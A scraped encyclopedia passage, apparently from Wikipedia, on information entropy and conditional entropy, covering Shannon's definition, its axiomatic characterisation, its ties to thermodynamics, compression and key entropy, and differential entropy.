if the involved differential entropies do not exist or are infinite. Joint differential entropy is also used in the definition of themutual informationbetween continuous random variables: The conditional differential entropy yields a lower bound on the expected squared error of anestimator. For any Gaussian random variableX{\displaystyle X}, observationY{\displaystyle Y}and estimatorX^{\displaystyle {\widehat {X}}}the following holds:[3]: 255 This is related to theuncertainty principlefromquantum mechanics. Inquantum information theory, the conditional entropy is generalized to theconditional quantum entropy. The latter can take negative values, unlike its classical counterpart.
https://en.wikipedia.org/wiki/Conditional_entropy
Ininformation theory, theentropyof arandom variablequantifies the average level of uncertainty or information associated with the variable's potential states or possible outcomes. This measures the expected amount of information needed to describe the state of the variable, considering the distribution of probabilities across all potential states. Given a discrete random variableX{\displaystyle X}, which may be any memberx{\displaystyle x}within the setX{\displaystyle {\mathcal {X}}}and is distributed according top:X→[0,1]{\displaystyle p\colon {\mathcal {X}}\to [0,1]}, the entropy isH(X):=−∑x∈Xp(x)log⁡p(x),{\displaystyle \mathrm {H} (X):=-\sum _{x\in {\mathcal {X}}}p(x)\log p(x),}whereΣ{\displaystyle \Sigma }denotes the sum over the variable's possible values.[Note 1]The choice of base forlog{\displaystyle \log }, thelogarithm, varies for different applications. Base 2 gives the unit ofbits(or "shannons"), while baseegives "natural units"nat, and base 10 gives units of "dits", "bans", or "hartleys". An equivalent definition of entropy is theexpected valueof theself-informationof a variable.[1] The concept of information entropy was introduced byClaude Shannonin his 1948 paper "A Mathematical Theory of Communication",[2][3]and is also referred to asShannon entropy. Shannon's theory defines adata communicationsystem composed of three elements: a source of data, acommunication channel, and a receiver. The "fundamental problem of communication" – as expressed by Shannon – is for the receiver to be able to identify what data was generated by the source, based on the signal it receives through the channel.[2][3]Shannon considered various ways to encode, compress, and transmit messages from a data source, and proved in hissource coding theoremthat the entropy represents an absolute mathematical limit on how well data from the source can belosslesslycompressed onto a perfectly noiseless channel. Shannon strengthened this result considerably for noisy channels in hisnoisy-channel coding theorem. Entropy in information theory is directly analogous to theentropyinstatistical thermodynamics. The analogy results when the values of the random variable designate energies of microstates, so Gibbs's formula for the entropy is formally identical to Shannon's formula. Entropy has relevance to other areas of mathematics such ascombinatoricsandmachine learning. The definition can be derived from a set ofaxiomsestablishing that entropy should be a measure of how informative the average outcome of a variable is. For a continuous random variable,differential entropyis analogous to entropy. The definitionE[−log⁡p(X)]{\displaystyle \mathbb {E} [-\log p(X)]}generalizes the above. The core idea of information theory is that the "informational value" of a communicated message depends on the degree to which the content of the message is surprising. If a highly likely event occurs, the message carries very little information. On the other hand, if a highly unlikely event occurs, the message is much more informative. For instance, the knowledge that some particular numberwill notbe the winning number of a lottery provides very little information, because any particular chosen number will almost certainly not win. However, knowledge that a particular numberwillwin a lottery has high informational value because it communicates the occurrence of a very low probability event. Theinformation content,also called thesurprisalorself-information,of an eventE{\displaystyle E}is a function that increases as the probabilityp(E){\displaystyle p(E)}of an event decreases. Whenp(E){\displaystyle p(E)}is close to 1, the surprisal of the event is low, but ifp(E){\displaystyle p(E)}is close to 0, the surprisal of the event is high. This relationship is described by the functionlog⁡(1p(E)),{\displaystyle \log \left({\frac {1}{p(E)}}\right),}wherelog{\displaystyle \log }is thelogarithm, which gives 0 surprise when the probability of the event is 1.[4]In fact,logis the only function that satisfies а specific set of conditions defined in section§ Characterization. Hence, we can define the information, or surprisal, of an eventE{\displaystyle E}byI(E)=−log⁡(p(E)),{\displaystyle I(E)=-\log(p(E)),}or equivalently,I(E)=log⁡(1p(E)).{\displaystyle I(E)=\log \left({\frac {1}{p(E)}}\right).} Entropy measures the expected (i.e., average) amount of information conveyed by identifying the outcome of a random trial.[5]: 67This implies that rolling a die has higher entropy than tossing a coin because each outcome of a die toss has smaller probability (p=1/6{\displaystyle p=1/6}) than each outcome of a coin toss (p=1/2{\displaystyle p=1/2}). Consider a coin with probabilitypof landing on heads and probability1 −pof landing on tails. The maximum surprise is whenp= 1/2, for which one outcome is not expected over the other. In this case a coin flip has an entropy of onebit(similarly, onetritwith equiprobable values containslog2⁡3{\displaystyle \log _{2}3}(about 1.58496) bits of information because it can have one of three values). The minimum surprise is whenp= 0(impossibility) orp= 1(certainty) and the entropy is zero bits. When the entropy is zero, sometimes referred to as unity[Note 2], there is no uncertainty at all – no freedom of choice – noinformation.[6]Other values ofpgive entropies between zero and one bits. Information theory is useful to calculate the smallest amount of information required to convey a message, as indata compression. For example, consider the transmission of sequences comprising the 4 characters 'A', 'B', 'C', and 'D' over a binary channel. If all 4 letters are equally likely (25%), one cannot do better than using two bits to encode each letter. 'A' might code as '00', 'B' as '01', 'C' as '10', and 'D' as '11'. However, if the probabilities of each letter are unequal, say 'A' occurs with 70% probability, 'B' with 26%, and 'C' and 'D' with 2% each, one could assign variable length codes. In this case, 'A' would be coded as '0', 'B' as '10', 'C' as '110', and 'D' as '111'. With this representation, 70% of the time only one bit needs to be sent, 26% of the time two bits, and only 4% of the time 3 bits. On average, fewer than 2 bits are required since the entropy is lower (owing to the high prevalence of 'A' followed by 'B' – together 96% of characters). The calculation of the sum of probability-weighted log probabilities measures and captures this effect. English text, treated as a string of characters, has fairly low entropy; i.e. it is fairly predictable. We can be fairly certain that, for example, 'e' will be far more common than 'z', that the combination 'qu' will be much more common than any other combination with a 'q' in it, and that the combination 'th' will be more common than 'z', 'q', or 'qu'. After the first few letters one can often guess the rest of the word. English text has between 0.6 and 1.3 bits of entropy per character of the message.[7]: 234 Named afterBoltzmann's Η-theorem, Shannon defined the entropyΗ(Greek capital lettereta) of adiscrete random variableX{\textstyle X}, which takes values in the setX{\displaystyle {\mathcal {X}}}and is distributed according top:X→[0,1]{\displaystyle p:{\mathcal {X}}\to [0,1]}such thatp(x):=P[X=x]{\displaystyle p(x):=\mathbb {P} [X=x]}: H(X)=E[I⁡(X)]=E[−log⁡p(X)].{\displaystyle \mathrm {H} (X)=\mathbb {E} [\operatorname {I} (X)]=\mathbb {E} [-\log p(X)].} HereE{\displaystyle \mathbb {E} }is theexpected value operator, andIis theinformation contentofX.[8]: 11[9]: 19–20I⁡(X){\displaystyle \operatorname {I} (X)}is itself a random variable. The entropy can explicitly be written as:H(X)=−∑x∈Xp(x)logb⁡p(x),{\displaystyle \mathrm {H} (X)=-\sum _{x\in {\mathcal {X}}}p(x)\log _{b}p(x),}wherebis thebase of the logarithmused. Common values ofbare 2,Euler's numbere, and 10, and the corresponding units of entropy are thebitsforb= 2,natsforb=e, andbansforb= 10.[10] In the case ofp(x)=0{\displaystyle p(x)=0}for somex∈X{\displaystyle x\in {\mathcal {X}}}, the value of the corresponding summand0 logb(0)is taken to be0, which is consistent with thelimit:[11]: 13limp→0+plog⁡(p)=0.{\displaystyle \lim _{p\to 0^{+}}p\log(p)=0.} One may also define theconditional entropyof two variablesX{\displaystyle X}andY{\displaystyle Y}taking values from setsX{\displaystyle {\mathcal {X}}}andY{\displaystyle {\mathcal {Y}}}respectively, as:[11]: 16H(X|Y)=−∑x,y∈X×YpX,Y(x,y)log⁡pX,Y(x,y)pY(y),{\displaystyle \mathrm {H} (X|Y)=-\sum _{x,y\in {\mathcal {X}}\times {\mathcal {Y}}}p_{X,Y}(x,y)\log {\frac {p_{X,Y}(x,y)}{p_{Y}(y)}},}wherepX,Y(x,y):=P[X=x,Y=y]{\displaystyle p_{X,Y}(x,y):=\mathbb {P} [X=x,Y=y]}andpY(y)=P[Y=y]{\displaystyle p_{Y}(y)=\mathbb {P} [Y=y]}. This quantity should be understood as the remaining randomness in the random variableX{\displaystyle X}given the random variableY{\displaystyle Y}. Entropy can be formally defined in the language ofmeasure theoryas follows:[12]Let(X,Σ,μ){\displaystyle (X,\Sigma ,\mu )}be aprobability space. LetA∈Σ{\displaystyle A\in \Sigma }be anevent. ThesurprisalofA{\displaystyle A}isσμ(A)=−ln⁡μ(A).{\displaystyle \sigma _{\mu }(A)=-\ln \mu (A).} Theexpectedsurprisal ofA{\displaystyle A}ishμ(A)=μ(A)σμ(A).{\displaystyle h_{\mu }(A)=\mu (A)\sigma _{\mu }(A).} Aμ{\displaystyle \mu }-almostpartitionis aset familyP⊆P(X){\displaystyle P\subseteq {\mathcal {P}}(X)}such thatμ(∪⁡P)=1{\displaystyle \mu (\mathop {\cup } P)=1}andμ(A∩B)=0{\displaystyle \mu (A\cap B)=0}for all distinctA,B∈P{\displaystyle A,B\in P}. (This is a relaxation of the usual conditions for a partition.) The entropy ofP{\displaystyle P}isHμ(P)=∑A∈Phμ(A).{\displaystyle \mathrm {H} _{\mu }(P)=\sum _{A\in P}h_{\mu }(A).} LetM{\displaystyle M}be asigma-algebraonX{\displaystyle X}. The entropy ofM{\displaystyle M}isHμ(M)=supP⊆MHμ(P).{\displaystyle \mathrm {H} _{\mu }(M)=\sup _{P\subseteq M}\mathrm {H} _{\mu }(P).}Finally, the entropy of the probability space isHμ(Σ){\displaystyle \mathrm {H} _{\mu }(\Sigma )}, that is, the entropy with respect toμ{\displaystyle \mu }of the sigma-algebra ofallmeasurable subsets ofX{\displaystyle X}. Recent studies on layered dynamical systems have introduced the concept of symbolic conditional entropy, further extending classical entropy measures to more abstract informational structures.[13] Consider tossing a coin with known, not necessarily fair, probabilities of coming up heads or tails; this can be modeled as aBernoulli process. The entropy of the unknown result of the next toss of the coin is maximized if the coin is fair (that is, if heads and tails both have equal probability 1/2). This is the situation of maximum uncertainty as it is most difficult to predict the outcome of the next toss; the result of each toss of the coin delivers one full bit of information. This is becauseH(X)=−∑i=1np(xi)logb⁡p(xi)=−∑i=1212log2⁡12=−∑i=1212⋅(−1)=1.{\displaystyle {\begin{aligned}\mathrm {H} (X)&=-\sum _{i=1}^{n}{p(x_{i})\log _{b}p(x_{i})}\\&=-\sum _{i=1}^{2}{{\frac {1}{2}}\log _{2}{\frac {1}{2}}}\\&=-\sum _{i=1}^{2}{{\frac {1}{2}}\cdot (-1)}=1.\end{aligned}}} However, if we know the coin is not fair, but comes up heads or tails with probabilitiespandq, wherep≠q, then there is less uncertainty. Every time it is tossed, one side is more likely to come up than the other. The reduced uncertainty is quantified in a lower entropy: on average each toss of the coin delivers less than one full bit of information. For example, ifp= 0.7, thenH(X)=−plog2⁡p−qlog2⁡q=−0.7log2⁡(0.7)−0.3log2⁡(0.3)≈−0.7⋅(−0.515)−0.3⋅(−1.737)=0.8816<1.{\displaystyle {\begin{aligned}\mathrm {H} (X)&=-p\log _{2}p-q\log _{2}q\\[1ex]&=-0.7\log _{2}(0.7)-0.3\log _{2}(0.3)\\[1ex]&\approx -0.7\cdot (-0.515)-0.3\cdot (-1.737)\\[1ex]&=0.8816<1.\end{aligned}}} Uniform probability yields maximum uncertainty and therefore maximum entropy. Entropy, then, can only decrease from the value associated with uniform probability. The extreme case is that of a double-headed coin that never comes up tails, or a double-tailed coin that never results in a head. Then there is no uncertainty. The entropy is zero: each toss of the coin delivers no new information as the outcome of each coin toss is always certain.[11]: 14–15 To understand the meaning of−Σpilog(pi), first define an information functionIin terms of an eventiwith probabilitypi. The amount of information acquired due to the observation of eventifollows from Shannon's solution of the fundamental properties ofinformation:[14] Given two independent events, if the first event can yield one ofnequiprobableoutcomes and another has one ofmequiprobable outcomes then there aremnequiprobable outcomes of the joint event. This means that iflog2(n)bits are needed to encode the first value andlog2(m)to encode the second, one needslog2(mn) = log2(m) + log2(n)to encode both. Shannon discovered that a suitable choice ofI{\displaystyle \operatorname {I} }is given by:[15]I⁡(p)=log⁡(1p)=−log⁡(p).{\displaystyle \operatorname {I} (p)=\log \left({\tfrac {1}{p}}\right)=-\log(p).} In fact, the only possible values ofI{\displaystyle \operatorname {I} }areI⁡(u)=klog⁡u{\displaystyle \operatorname {I} (u)=k\log u}fork<0{\displaystyle k<0}. Additionally, choosing a value forkis equivalent to choosing a valuex>1{\displaystyle x>1}fork=−1/log⁡x{\displaystyle k=-1/\log x}, so thatxcorresponds to thebase for the logarithm. Thus, entropy ischaracterizedby the above four properties. I⁡(p1p2)=I⁡(p1)+I⁡(p2)Starting from property 3p2I′⁡(p1p2)=I′⁡(p1)taking the derivative w.r.tp1I′⁡(p1p2)+p1p2I″⁡(p1p2)=0taking the derivative w.r.tp2I′⁡(u)+uI″⁡(u)=0introducingu=p1p2(uI′⁡(u))′=0combining terms into oneuI′⁡(u)−k=0integrating w.r.tu,producing constantk{\displaystyle {\begin{aligned}&\operatorname {I} (p_{1}p_{2})&=\ &\operatorname {I} (p_{1})+\operatorname {I} (p_{2})&&\quad {\text{Starting from property 3}}\\&p_{2}\operatorname {I} '(p_{1}p_{2})&=\ &\operatorname {I} '(p_{1})&&\quad {\text{taking the derivative w.r.t}}\ p_{1}\\&\operatorname {I} '(p_{1}p_{2})+p_{1}p_{2}\operatorname {I} ''(p_{1}p_{2})&=\ &0&&\quad {\text{taking the derivative w.r.t}}\ p_{2}\\&\operatorname {I} '(u)+u\operatorname {I} ''(u)&=\ &0&&\quad {\text{introducing}}\,u=p_{1}p_{2}\\&(u\operatorname {I} '(u))'&=\ &0&&\quad {\text{combining terms into one}}\ \\&u\operatorname {I} '(u)-k&=\ &0&&\quad {\text{integrating w.r.t}}\ u,{\text{producing constant}}\,k\\\end{aligned}}} Thisdifferential equationleads to the solutionI⁡(u)=klog⁡u+c{\displaystyle \operatorname {I} (u)=k\log u+c}for somek,c∈R{\displaystyle k,c\in \mathbb {R} }. Property 2 givesc=0{\displaystyle c=0}. Property 1 and 2 give thatI⁡(p)≥0{\displaystyle \operatorname {I} (p)\geq 0}for allp∈[0,1]{\displaystyle p\in [0,1]}, so thatk<0{\displaystyle k<0}. The differentunits of information(bitsfor thebinary logarithmlog2,natsfor thenatural logarithmln,bansfor thedecimal logarithmlog10and so on) areconstant multiplesof each other. For instance, in case of a fair coin toss, heads provideslog2(2) = 1bit of information, which is approximately 0.693 nats or 0.301 decimal digits. Because of additivity,ntosses providenbits of information, which is approximately0.693nnats or0.301ndecimal digits. Themeaningof the events observed (the meaning ofmessages) does not matter in the definition of entropy. Entropy only takes into account the probability of observing a specific event, so the information it encapsulates is information about the underlyingprobability distribution, not the meaning of the events themselves. Another characterization of entropy uses the following properties. We denotepi= Pr(X=xi)andΗn(p1, ...,pn) = Η(X). The rule of additivity has the following consequences: forpositive integersbiwhereb1+ ... +bk=n,Hn(1n,…,1n)=Hk(b1n,…,bkn)+∑i=1kbinHbi(1bi,…,1bi).{\displaystyle \mathrm {H} _{n}\left({\frac {1}{n}},\ldots ,{\frac {1}{n}}\right)=\mathrm {H} _{k}\left({\frac {b_{1}}{n}},\ldots ,{\frac {b_{k}}{n}}\right)+\sum _{i=1}^{k}{\frac {b_{i}}{n}}\,\mathrm {H} _{b_{i}}\left({\frac {1}{b_{i}}},\ldots ,{\frac {1}{b_{i}}}\right).} Choosingk=n,b1= ... =bn= 1this implies that the entropy of a certain outcome is zero:Η1(1) = 0. This implies that the efficiency of a source set withnsymbols can be defined simply as being equal to itsn-ary entropy. See alsoRedundancy (information theory). The characterization here imposes an additive property with respect to apartition of a set. Meanwhile, theconditional probabilityis defined in terms of a multiplicative property,P(A∣B)⋅P(B)=P(A∩B){\displaystyle P(A\mid B)\cdot P(B)=P(A\cap B)}. Observe that a logarithm mediates between these two operations. Theconditional entropyand related quantities inherit simple relation, in turn. The measure theoretic definition in the previous section defined the entropy as a sum over expected surprisalsμ(A)⋅ln⁡μ(A){\displaystyle \mu (A)\cdot \ln \mu (A)}for an extremal partition. Here the logarithm is ad hoc and the entropy is not a measure in itself. At least in the information theory of a binary string,log2{\displaystyle \log _{2}}lends itself to practical interpretations. Motivated by such relations, a plethora of related and competing quantities have been defined. For example,David Ellerman's analysis of a "logic of partitions" defines a competing measure in structuresdualto that of subsets of a universal set.[16]Information is quantified as "dits" (distinctions), a measure on partitions. "Dits" can be converted intoShannon's bits, to get the formulas for conditional entropy, and so on. Another succinct axiomatic characterization of Shannon entropy was given byAczél, Forte and Ng,[17]via the following properties: It was shown that any functionH{\displaystyle \mathrm {H} }satisfying the above properties must be a constant multiple of Shannon entropy, with a non-negative constant.[17]Compared to the previously mentioned characterizations of entropy, this characterization focuses on the properties of entropy as a function of random variables (subadditivity and additivity), rather than the properties of entropy as a function of the probability vectorp1,…,pn{\displaystyle p_{1},\ldots ,p_{n}}. It is worth noting that if we drop the "small for small probabilities" property, thenH{\displaystyle \mathrm {H} }must be a non-negative linear combination of the Shannon entropy and theHartley entropy.[17] The Shannon entropy satisfies the following properties, for some of which it is useful to interpret entropy as the expected amount of information learned (or uncertainty eliminated) by revealing the value of a random variableX: The inspiration for adopting the wordentropyin information theory came from the close resemblance between Shannon's formula and very similar known formulae fromstatistical mechanics. Instatistical thermodynamicsthe most general formula for the thermodynamicentropySof athermodynamic systemis theGibbs entropyS=−kB∑ipiln⁡pi,{\displaystyle S=-k_{\text{B}}\sum _{i}p_{i}\ln p_{i}\,,}wherekBis theBoltzmann constant, andpiis the probability of amicrostate. TheGibbs entropywas defined byJ. Willard Gibbsin 1878 after earlier work byLudwig Boltzmann(1872).[18] The Gibbs entropy translates over almost unchanged into the world ofquantum physicsto give thevon Neumann entropyintroduced byJohn von Neumannin 1927:S=−kBTr(ρln⁡ρ),{\displaystyle S=-k_{\text{B}}\,{\rm {Tr}}(\rho \ln \rho )\,,}where ρ is thedensity matrixof the quantum mechanical system and Tr is thetrace.[19] At an everyday practical level, the links between information entropy and thermodynamic entropy are not evident. Physicists and chemists are apt to be more interested inchangesin entropy as a system spontaneously evolves away from its initial conditions, in accordance with thesecond law of thermodynamics, rather than an unchanging probability distribution. As the minuteness of the Boltzmann constantkBindicates, the changes inS/kBfor even tiny amounts of substances in chemical and physical processes represent amounts of entropy that are extremely large compared to anything indata compressionorsignal processing. In classical thermodynamics, entropy is defined in terms of macroscopic measurements and makes no reference to any probability distribution, which is central to the definition of information entropy. The connection between thermodynamics and what is now known as information theory was first made by Boltzmann and expressed by hisequation: S=kBln⁡W,{\displaystyle S=k_{\text{B}}\ln W,} whereS{\displaystyle S}is the thermodynamic entropy of a particular macrostate (defined by thermodynamic parameters such as temperature, volume, energy, etc.),Wis the number of microstates (various combinations of particles in various energy states) that can yield the given macrostate, andkBis the Boltzmann constant.[20]It is assumed that each microstate is equally likely, so that the probability of a given microstate ispi= 1/W. When these probabilities are substituted into the above expression for the Gibbs entropy (or equivalentlykBtimes the Shannon entropy), Boltzmann's equation results. In information theoretic terms, the information entropy of a system is the amount of "missing" information needed to determine a microstate, given the macrostate. In the view ofJaynes(1957),[21]thermodynamic entropy, as explained bystatistical mechanics, should be seen as anapplicationof Shannon's information theory: the thermodynamic entropy is interpreted as being proportional to the amount of further Shannon information needed to define the detailed microscopic state of the system, that remains uncommunicated by a description solely in terms of the macroscopic variables of classical thermodynamics, with the constant of proportionality being just the Boltzmann constant. Adding heat to a system increases its thermodynamic entropy because it increases the number of possible microscopic states of the system that are consistent with the measurable values of its macroscopic variables, making any complete state description longer. (See article:maximum entropy thermodynamics).Maxwell's demoncan (hypothetically) reduce the thermodynamic entropy of a system by using information about the states of individual molecules; but, asLandauer(from 1961) and co-workers[22]have shown, to function the demon himself must increase thermodynamic entropy in the process, by at least the amount of Shannon information he proposes to first acquire and store; and so the total thermodynamic entropy does not decrease (which resolves the paradox).Landauer's principleimposes a lower bound on the amount of heat a computer must generate to process a given amount of information, though modern computers are far less efficient. Shannon's definition of entropy, when applied to an information source, can determine the minimum channel capacity required to reliably transmit the source as encoded binary digits. Shannon's entropy measures the information contained in a message as opposed to the portion of the message that is determined (or predictable). Examples of the latter include redundancy in language structure or statistical properties relating to the occurrence frequencies of letter or word pairs, triplets etc. The minimum channel capacity can be realized in theory by using thetypical setor in practice usingHuffman,Lempel–Zivorarithmetic coding. (See alsoKolmogorov complexity.) In practice, compression algorithms deliberately include some judicious redundancy in the form ofchecksumsto protect against errors. Theentropy rateof a data source is the average number of bits per symbol needed to encode it. Shannon's experiments with human predictors show an information rate between 0.6 and 1.3 bits per character in English;[23]thePPM compression algorithmcan achieve a compression ratio of 1.5 bits per character in English text. If acompressionscheme is lossless – one in which you can always recover the entire original message by decompression – then a compressed message has the same quantity of information as the original but is communicated in fewer characters. It has more information (higher entropy) per character. A compressed message has lessredundancy.Shannon's source coding theoremstates a lossless compression scheme cannot compress messages, on average, to havemorethan one bit of information per bit of message, but that any valuelessthan one bit of information per bit of message can be attained by employing a suitable coding scheme. The entropy of a message per bit multiplied by the length of that message is a measure of how much total information the message contains. Shannon's theorem also implies that no lossless compression scheme can shortenallmessages. If some messages come out shorter, at least one must come out longer due to thepigeonhole principle. In practical use, this is generally not a problem, because one is usually only interested in compressing certain types of messages, such as a document in English, as opposed to gibberish text, or digital photographs rather than noise, and it is unimportant if a compression algorithm makes some unlikely or uninteresting sequences larger. A 2011 study inScienceestimates the world's technological capacity to store and communicate optimally compressed information normalized on the most effective compression algorithms available in the year 2007, therefore estimating the entropy of the technologically available sources.[24]: 60–65 The authors estimate humankind technological capacity to store information (fully entropically compressed) in 1986 and again in 2007. They break the information into three categories—to store information on a medium, to receive information through one-waybroadcastnetworks, or to exchange information through two-waytelecommunications networks.[24] Entropy is one of several ways to measure biodiversity and is applied in the form of theShannon index.[25]A diversity index is a quantitative statistical measure of how many different types exist in a dataset, such as species in a community, accounting for ecologicalrichness,evenness, anddominance. Specifically, Shannon entropy is the logarithm of1D, thetrue diversityindex with parameter equal to 1. The Shannon index is related to the proportional abundances of types. There are a number of entropy-related concepts that mathematically quantify information content of a sequence or message: (The "rate of self-information" can also be defined for a particular sequence of messages or symbols generated by a given stochastic process: this will always be equal to the entropy rate in the case of astationary process.) Otherquantities of informationare also used to compare or relate different sources of information. It is important not to confuse the above concepts. Often it is only clear from context which one is meant. For example, when someone says that the "entropy" of the English language is about 1 bit per character, they are actually modeling the English language as a stochastic process and talking about its entropyrate. Shannon himself used the term in this way. If very large blocks are used, the estimate of per-character entropy rate may become artificially low because the probability distribution of the sequence is not known exactly; it is only an estimate. If one considers the text of every book ever published as a sequence, with each symbol being the text of a complete book, and if there areNpublished books, and each book is only published once, the estimate of the probability of each book is1/N, and the entropy (in bits) is−log2(1/N) = log2(N). As a practical code, this corresponds to assigning each book aunique identifierand using it in place of the text of the book whenever one wants to refer to the book. This is enormously useful for talking about books, but it is not so useful for characterizing the information content of an individual book, or of language in general: it is not possible to reconstruct the book from its identifier without knowing the probability distribution, that is, the complete text of all the books. The key idea is that the complexity of the probabilistic model must be considered.Kolmogorov complexityis a theoretical generalization of this idea that allows the consideration of the information content of a sequence independent of any particular probability model; it considers the shortestprogramfor auniversal computerthat outputs the sequence. A code that achieves the entropy rate of a sequence for a given model, plus the codebook (i.e. the probabilistic model), is one such program, but it may not be the shortest. The Fibonacci sequence is 1, 1, 2, 3, 5, 8, 13, .... treating the sequence as a message and each number as a symbol, there are almost as many symbols as there are characters in the message, giving an entropy of approximatelylog2(n). The first 128 symbols of the Fibonacci sequence has an entropy of approximately 7 bits/symbol, but the sequence can be expressed using a formula [F(n) = F(n−1) + F(n−2)forn= 3, 4, 5, ...,F(1) =1,F(2) = 1] and this formula has a much lower entropy and applies to any length of the Fibonacci sequence. Incryptanalysis, entropy is often roughly used as a measure of the unpredictability of a cryptographic key, though its realuncertaintyis unmeasurable. For example, a 128-bit key that is uniformly and randomly generated has 128 bits of entropy. It also takes (on average)2127{\displaystyle 2^{127}}guesses to break by brute force. Entropy fails to capture the number of guesses required if the possible keys are not chosen uniformly.[26][27]Instead, a measure calledguessworkcan be used to measure the effort required for a brute force attack.[28] Other problems may arise from non-uniform distributions used in cryptography. For example, a 1,000,000-digit binaryone-time padusing exclusive or. If the pad has 1,000,000 bits of entropy, it is perfect. If the pad has 999,999 bits of entropy, evenly distributed (each individual bit of the pad having 0.999999 bits of entropy) it may provide good security. But if the pad has 999,999 bits of entropy, where the first bit is fixed and the remaining 999,999 bits are perfectly random, the first bit of the ciphertext will not be encrypted at all. A common way to define entropy for text is based on theMarkov modelof text. For an order-0 source (each character is selected independent of the last characters), the binary entropy is: H(S)=−∑ipilog⁡pi,{\displaystyle \mathrm {H} ({\mathcal {S}})=-\sum _{i}p_{i}\log p_{i},} wherepiis the probability ofi. For a first-orderMarkov source(one in which the probability of selecting a character is dependent only on the immediately preceding character), theentropy rateis:[citation needed] H(S)=−∑ipi∑jpi(j)log⁡pi(j),{\displaystyle \mathrm {H} ({\mathcal {S}})=-\sum _{i}p_{i}\sum _{j}\ p_{i}(j)\log p_{i}(j),} whereiis astate(certain preceding characters) andpi(j){\displaystyle p_{i}(j)}is the probability ofjgivenias the previous character. For a second order Markov source, the entropy rate is H(S)=−∑ipi∑jpi(j)∑kpi,j(k)log⁡pi,j(k).{\displaystyle \mathrm {H} ({\mathcal {S}})=-\sum _{i}p_{i}\sum _{j}p_{i}(j)\sum _{k}p_{i,j}(k)\ \log p_{i,j}(k).} A source setX{\displaystyle {\mathcal {X}}}with a non-uniform distribution will have less entropy than the same set with a uniform distribution (i.e. the "optimized alphabet"). This deficiency in entropy can be expressed as a ratio called efficiency:[29] η(X)=HHmax=−∑i=1np(xi)logb⁡(p(xi))logb⁡(n).{\displaystyle \eta (X)={\frac {H}{H_{\text{max}}}}=-\sum _{i=1}^{n}{\frac {p(x_{i})\log _{b}(p(x_{i}))}{\log _{b}(n)}}.}Applying the basic properties of the logarithm, this quantity can also be expressed as:η(X)=−∑i=1np(xi)logb⁡(p(xi))logb⁡(n)=∑i=1nlogb⁡(p(xi)−p(xi))logb⁡(n)=∑i=1nlogn⁡(p(xi)−p(xi))=logn⁡(∏i=1np(xi)−p(xi)).{\displaystyle {\begin{aligned}\eta (X)&=-\sum _{i=1}^{n}{\frac {p(x_{i})\log _{b}(p(x_{i}))}{\log _{b}(n)}}=\sum _{i=1}^{n}{\frac {\log _{b}\left(p(x_{i})^{-p(x_{i})}\right)}{\log _{b}(n)}}\\[1ex]&=\sum _{i=1}^{n}\log _{n}\left(p(x_{i})^{-p(x_{i})}\right)=\log _{n}\left(\prod _{i=1}^{n}p(x_{i})^{-p(x_{i})}\right).\end{aligned}}} Efficiency has utility in quantifying the effective use of acommunication channel. This formulation is also referred to as the normalized entropy, as the entropy is divided by the maximum entropylogb⁡(n){\displaystyle {\log _{b}(n)}}. Furthermore, the efficiency is indifferent to the choice of (positive) baseb, as indicated by the insensitivity within the final logarithm above thereto. The Shannon entropy is restricted to random variables taking discrete values. The corresponding formula for a continuous random variable withprobability density functionf(x)with finite or infinite supportX{\displaystyle \mathbb {X} }on the real line is defined by analogy, using the above form of the entropy as an expectation:[11]: 224 H(X)=E[−log⁡f(X)]=−∫Xf(x)log⁡f(x)dx.{\displaystyle \mathrm {H} (X)=\mathbb {E} [-\log f(X)]=-\int _{\mathbb {X} }f(x)\log f(x)\,\mathrm {d} x.} This is the differential entropy (or continuous entropy). A precursor of the continuous entropyh[f]is the expression for the functionalΗin theH-theoremof Boltzmann. Although the analogy between both functions is suggestive, the following question must be set: is the differential entropy a valid extension of the Shannon discrete entropy? Differential entropy lacks a number of properties that the Shannon discrete entropy has – it can even be negative – and corrections have been suggested, notablylimiting density of discrete points. To answer this question, a connection must be established between the two functions: In order to obtain a generally finite measure as thebin sizegoes to zero. In the discrete case, the bin size is the (implicit) width of each of then(finite or infinite) bins whose probabilities are denoted bypn. As the continuous domain is generalized, the width must be made explicit. To do this, start with a continuous functionfdiscretized into bins of sizeΔ{\displaystyle \Delta }. By the mean-value theorem there exists a valuexiin each bin such thatf(xi)Δ=∫iΔ(i+1)Δf(x)dx{\displaystyle f(x_{i})\Delta =\int _{i\Delta }^{(i+1)\Delta }f(x)\,dx}the integral of the functionfcan be approximated (in the Riemannian sense) by∫−∞∞f(x)dx=limΔ→0∑i=−∞∞f(xi)Δ,{\displaystyle \int _{-\infty }^{\infty }f(x)\,dx=\lim _{\Delta \to 0}\sum _{i=-\infty }^{\infty }f(x_{i})\Delta ,}where this limit and "bin size goes to zero" are equivalent. We will denoteHΔ:=−∑i=−∞∞f(xi)Δlog⁡(f(xi)Δ){\displaystyle \mathrm {H} ^{\Delta }:=-\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log \left(f(x_{i})\Delta \right)}and expanding the logarithm, we haveHΔ=−∑i=−∞∞f(xi)Δlog⁡(f(xi))−∑i=−∞∞f(xi)Δlog⁡(Δ).{\displaystyle \mathrm {H} ^{\Delta }=-\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log(f(x_{i}))-\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log(\Delta ).} AsΔ → 0, we have ∑i=−∞∞f(xi)Δ→∫−∞∞f(x)dx=1∑i=−∞∞f(xi)Δlog⁡(f(xi))→∫−∞∞f(x)log⁡f(x)dx.{\displaystyle {\begin{aligned}\sum _{i=-\infty }^{\infty }f(x_{i})\Delta &\to \int _{-\infty }^{\infty }f(x)\,dx=1\\\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log(f(x_{i}))&\to \int _{-\infty }^{\infty }f(x)\log f(x)\,dx.\end{aligned}}} Note;log(Δ) → −∞asΔ → 0, requires a special definition of the differential or continuous entropy: h[f]=limΔ→0(HΔ+log⁡Δ)=−∫−∞∞f(x)log⁡f(x)dx,{\displaystyle h[f]=\lim _{\Delta \to 0}\left(\mathrm {H} ^{\Delta }+\log \Delta \right)=-\int _{-\infty }^{\infty }f(x)\log f(x)\,dx,} which is, as said before, referred to as the differential entropy. This means that the differential entropyis nota limit of the Shannon entropy forn→ ∞. Rather, it differs from the limit of the Shannon entropy by an infinite offset (see also the article oninformation dimension). It turns out as a result that, unlike the Shannon entropy, the differential entropy isnotin general a good measure of uncertainty or information. For example, the differential entropy can be negative; also it is not invariant under continuous co-ordinate transformations. This problem may be illustrated by a change of units whenxis a dimensioned variable.f(x)will then have the units of1/x. The argument of the logarithm must be dimensionless, otherwise it is improper, so that the differential entropy as given 